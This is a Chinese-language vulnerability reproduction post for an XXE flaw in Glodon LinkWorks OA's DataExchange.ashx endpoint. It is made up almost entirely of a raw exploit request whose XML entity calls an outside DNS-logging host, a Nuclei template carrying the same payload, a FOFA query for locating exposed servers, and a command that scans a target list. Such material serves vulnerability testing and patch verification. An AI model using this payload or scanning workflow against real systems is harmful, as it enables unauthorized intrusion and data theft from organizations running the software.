[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞

POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1Host: 192.168.40.130:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Content-Length: 415Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0Purpose: prefetchSec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0Content-Disposition: form-data;name="SystemName"

BIM------WebKitFormBoundaryJGgV5l5ta05yAIe0Content-Disposition: form-data;name="Params"Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">]><test>&t;</test>------WebKitFormBoundaryJGgV5l5ta05yAIe0--

id: glodon-linkworks-DataExchange-xxe

info:  name: 广联达Linkworks DataExchange.ashx XXE漏洞  author: fgz  severity: critical  description: 广联达LinkWorks办公OA（Office Automation）是一款综合办公自动化系统，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。该系统/GB/LK/Document/DataExchange/DataExchange.ashx接口存在XXE漏洞，攻击者可以在xml中构造恶意命令，会导致服务器数据泄露以及被远控。  metadata:    max-request: 1    fofa-query: body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"    verified: truerequests:  - raw:      - |+        POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36        Sec-Purpose: prefetch;prerender        Purpose: prefetch        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close        Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0                ------WebKitFormBoundaryJGgV5l5ta05yAIe0        Content-Disposition: form-data;name="SystemName"                BIM        ------WebKitFormBoundaryJGgV5l5ta05yAIe0        Content-Disposition: form-data;name="Params"        Content-Type: text/plain                <?xml version="1.0" encoding="UTF-8"?>        <!DOCTYPE test [        <!ENTITY t SYSTEM "http://{{interactsh-url}}">        ]        >        <test>&t;</test>        ------WebKitFormBoundaryJGgV5l5ta05yAIe0--

    matchers:      - type: dsl        dsl:          - contains(interactsh_protocol, "dns")        condition: and

nuclei.exe -t mypoc/广联达/glodon-linkworks-DataExchange-xxe.yaml -l data/广联达Linkworks.txt